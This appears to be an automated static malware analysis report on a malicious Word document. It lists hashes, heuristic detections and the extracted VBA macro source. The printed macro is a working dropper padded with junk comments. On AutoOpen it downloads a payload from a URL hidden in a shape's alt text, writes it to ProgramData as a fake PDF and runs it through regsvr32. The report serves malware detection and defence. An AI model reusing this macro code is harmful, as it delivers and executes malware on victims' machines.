Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ae30632570b4b2cc…

MALICIOUS

Office (OOXML)

138.1 KB Created: 2020-10-06 09:52:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-09
MD5: e734fa5d84d0be8f5c64426c8b4035b3 SHA-1: 85666af1c30d5d6571067ac97563d0b47da921cf SHA-256: ae30632570b4b2cc36189283baf703d18e9a8ace92aea88f846345c8c3031203
170 Risk Score

Heuristics 6

  • ClamAV: Doc.Dropper.Generic-9823539-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-9823539-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set rNECW = CreateObject("WinHttp.WinHttpRequest.5.1")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10309 bytes
SHA-256: 0843fc16efed1ea9ba3962676ad5d0412ecc0ae2f9c0b3e556c5f2c00f5a5d67
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Lgzab"
Sub VLgiO(FOwkt, Optional ByVal ZnPYB As String = "c:\programdata\KFpFM.pdf")
' Excuses
' Disputation raincoat rising westernmost
' Lawlessness
' Stringent fatiguing knell
' Reintroduce casanova specifically
' Vertebrates easternmost
' Radiograph huntergatherers hopefully inspiration
' Burps
' Chintz user nightly
' Conversion
' Range disinformation despair
' Interject means thebes stagnating
' Exigencies narrator into singleminded
' Goalpost globalisation
' Infamously monetary detonations throroughly
' Dissatisfied flatness dumps armour
' Erring dressing libraries hugging stalling
' Porns carvery bleeding
' Smashed aftereffect runny monaural conversed interpreting
' Lurked pyromaniac constriction
' Tentacle swirling semiconscious
' Texturally
' Sky regenerated
' Storing eloquently overstuffed thinkers confectioner
' Heptagonal baseball
' Hover placid scholastic peripheries murmurs
' Recombined uneasily
' Clandestine cinder
' Preferences ordinal
' Lodging
' Frees audaciously
' Mobilisable biassed hundred
' Bonded neutrally insidiously sewer
' Geometer manatee
' Superlatively gruel
' Speculative droopingly disenfranchisement skylight manually dominion
' Bourbons ignominy cleared hydroxides
' Historiography producing
' Martin quintic criminologists
QurcP = ZnPYB
Open QurcP For Output As #1
' Briefs extraordinary catechisms moaning
' Decisiveness terrifies
' Howsoever disclosure reinterpreted
' Assiduously subtleties
' Fit chequers resubmitted thrombus default
Print #1, FOwkt
' Mineral ho liquidising conventional gunned
' Decimating incorporating specialness
' Choirboys trophy mentalistic basting
' Bombs theta carbuncles led spinoff bevelled virginal
' Tantalisingly intestate
Close #1
End Sub
' Hurls accident arbitrations
' Sprouted
' Trisecting bright
' Impermeable doubts
' Tibiae varnishing haitian effigy cairn
' Gilders intruders annoyers repartition
' Moves permissible wounded lark
Sub AutoOpen()
' Beehives scorpion tensing approachability conversion
' Repertory cobble controlling ohms anal
' Origins alibi agitated yesterday phrenologists technically asymptote
' Perishes capriole slipper
' Whey extirpation
' Photoelectrically stuck adaptively basketry
' Idyllic unionised
' Footings desperation agglutinative incapacitating
' Oaken true headwork sunnier
' Familiarly malignancies flawlessly helicopters fume hermitage
' Madden
' Agreeing counterbalance waviest maisonettes illustrator
' Draughtsmanship transposition indiana
' Fitly
' Saturnine litters molesters coppices dermatologists carnal
' Awakened lemon cowherd
' Adroitly domestically immunise
' Spilt harshens patiently
' Footmen bluemoon
' Snapshot repackaged
' Gauging scuffing oracle zombie
' Yelled ideologist
' Tipple obdurate polarisation endeavoured iconographic
' Jazzy collies slushiest dewy restructuring
' Prelates dingo motorcyclist refrigerants
Dim cfqNf As New kIbPj
' Precocious transporter trinket compliance boons
' Crouching stare rematerialised cloven
' Glob cantons exploring hygienist billiard hacker
' Crisscrosses ephor drying glaring debenture
' Drunkard discipleship festivities strengthen faunal inhalant
FOwkt = cfqNf.AlImd()
' Testimony
' Legislate radiate
' Affability appreciated
' Trendiness tune
' Desperate kongo fireproof flimsy
' Eightieth cupboard marked larceny
VLgiO PYRQd(FOwkt)
' Dredging gladly seventieth computerliterate exhibitionism relearn
' Percolation expensive reassuming
' Propose booby planetesimals tremor
' Relic forlorn gallon refillings
' Helpfulness dispositions
' Animation kilometre pantiled conquerable
' Cowering orchestra
' Chaperone porkchop commutativity
' Photographic
' Untextured prosper subcontracting
RrMYM XNYBo(0) + "r32 c:\programdata\KFpFM.pdf", ""
End Sub
Function UFLVz(fIwKD, kEtzP)
' Toss photolysis naughts threesomes ennobling lawsuit
' Tibia tailplane
' Larynxes frogmen stepladder throatiest unmaintained
' Opportunists
' Galactic tax marking merry
' Suede pruned equipments deletes
UFLVz = Split(fIwKD, kEtzP)
End Function

Attribute VB_Name = "wWYkw"
' Guild buttressing suggestive aswan investigate strictness
' Screw monarchic
' Regrets nicknames contrariwise molecule cottages
' Prettify wonderfulness currency assuages
' Accumulate
Function PYRQd(HQwQT)
' Irredeemably mutilated avid bureaucratic anaesthetic
' Carved directors frisson
' Fetches fly subplot parry
' Warsaw usherette inhabits footman
' Hypercubes provident legalise bequests bigness
PYRQd = StrConv(HQwQT, vbUnicode)
' Limbering stereotype groggiest
' Pyromaniacs method canary
' Liquidation chastise embarrassedly enthalpies
' Retinitis persecute blinking bra antigens
' Hairbrush matcher truants unreal brazil elongates
End Function
' Stringing rerouted misfire composing discrepant
' Blemished wanderer
' Standards nairobi newness
' Averts handler quickened
Function MLhBm()
' Introverted snatching ticking
' Attacker cowboy
' Romantics gleefulness negligee
' Batons lip malachite
' Quarrels pawn
' Foams militaristic diehard
' Refreshments
' Contemplated specialisations
MLhBm = ActiveDocument.shapes(1).AlternativeText
End Function
' Doubters mezzosoprano megastar uncountable crouches
' Artichoke fables hertz urbanely
' Splattered burgle splash realistic fiercer
' Aboard utah ricocheted latrine
Function XNYBo(OniCN)
' Bahamas
' Thymus cyclic lankiest
' Catapults tautly reconstitution regales
' Homoeopathic airbase
' Undressed sorcerers inhaled envelops
' Wrangling shielings usage
' Deforestation
' Ambassadorial entailed nestegg
' Clumsy animators depraves goalless
kaHFl = MLhBm()
TIieZ = UFLVz(kaHFl, "kristi")
OFMcZ = TIieZ(OniCN)
XNYBo = OFMcZ
End Function

Attribute VB_Name = "kIbPj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Numberless inspire
' Dove conveyed
' Piecing wrinkle sneakiest saki
' Hoverer cockerel
' Stochastic maleness forgiven manipulators
' Bejewelled
Function AlImd()
' Floridly muzzling fetal puritanism emphysema
' Defaced mooing dovetails
' Hosier drafting
' Entrances hostel
' Rosily infest
Dim rNECW As Object
' Torturous mending intro hares clay
' Sentimentalist
' Expressing image missal backsliding
' Bulldozers crustier
' Trust niches breakaway tricolour
' Chomp frustratingly
Set rNECW = CreateObject("WinHttp.WinHttpRequest.5.1")
' Aid sinking reinforcement
' Enclasp coupons perfect
' Intermissions conveying anoint
' Miniaturisation microgravity uncontentious
' Haltered feat obstinate
' Lagoons physician tipsy jejune
' Beau internally tartan
' Welcomed scenery rayed
' Delightedly explorer rakish designs
' Stunts
' Dismay sneered emigrants frumpy
' Intent happier
' Deerstalker wakens introvert heredity
' Peeped spellers
' Commemoration piranha brutalised imams
' Ironmongery outgrowth officialdom aqua
' Pustules paralysing
' Dermal bib starlet hitch steeped bivalve
' Forester anatomically dairymen
' Grownup competes
' Compiles kelts keeled click meanest
' Dents emotional unknowns
' Forwardness maddeningly accreditation
' Pings fifteen spelling
' Fusion idiolect
' Staggered meows rapping extrapolation quiescent enlarges
' Haste networking handrails autonomously labyrinthine
BBTJg = XNYBo(1)
' Doodled coursework punch unsightly underlings
' Camphor diary sprats factory unjust
' Stickers
' Victimless impropriety
' Tarpaulins desecrated
rNECW.Open "GET", BBTJg, False
' Behold retraced unattached inverses deliverers divulged
' Commandingly eroding catered
' Packed
' Alternately bong
rNECW.Send
' Saner insubstantial quorum
' Eventualities ecumenism supranationalism turnover
' Gatecrash anywhere fanatical
' Everchanging estimating
' Desirableness
AlImd = rNECW.responsebody
End Function

Attribute VB_Name = "LtDJi"
Sub RrMYM(mjmZI, tZzPk)
' Brethren underlying
' Sophisticates lurchers tangerines adjectival impoverished
' Profaneness rivulet
' Monogamously tyrannicide spiritedly reintroduction
' Conceded boxtops
' Barracking contretemps
' Scrambler nearly petty
' Heartbroken
' Fended gladiators circumvent
' Salacious overextended missiles
' Diaphragms delivering informality shank matures
Set ZLokh = CreateObject(tZzPk + XNYBo(2) + "ll").exec(mjmZI)
' Suggestive rumblings cirrus
' Aviation pancakes purposely virility groomer dampens
' Averts suchandsuch
' Undaunted alchemical sent extremist cornets
' Retreating lemma
' Fogs industrialise
' Belonged foreshortening pangs clinking
' Bun
' Eden ibexes controllers distally
' Acetal buckskin prosody praised
' Ruining
' Burps manometer stocking inaccuracies disaffected bulletproof
' Declivity presuming securer powdered ratatouille cops
' Oppressiveness bellyful
' Closes arbitrations homosexually suspended
' Mixed introducing adjudicates turret
' Cruller glaring
' Turbocharger behaviours exploit electrotechnical
' Testing
' Prosecutorial crochet subdivides irk breakaways undermining
' Unfasten
' Habitations rhinoceros
' Cornices snowdrops emits cumlaude
' Help dictator hindbrain rectum
' Daddies coral flyweight workers
' Romanticising ponytail assiduously reinsurance
' Tarnish
' Feminism lacuna vertiginous contuse tsetse
' Cavaliers anal lute shortfall calcutta
' Header
' Unhealthier jauntily
' Nostalgically omnivores critical
' Wallow compactness influxes crops nests
' Impossibility intellectuals
' Starkness particularised abounds similar
' Tannery thinned dovetails
' Booster globules rehearing
' Sigmoid immunity hymen entomb
' Edging hallucinating farad festival perspicuous teaspoons tectonic
' Infeasibility
' Ahead fringy tourer
' Crock describable paraboloids
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes
SHA-256: a873661e72266f8028aacb4b03917f4f10b2734f73031945c232b5836f424e23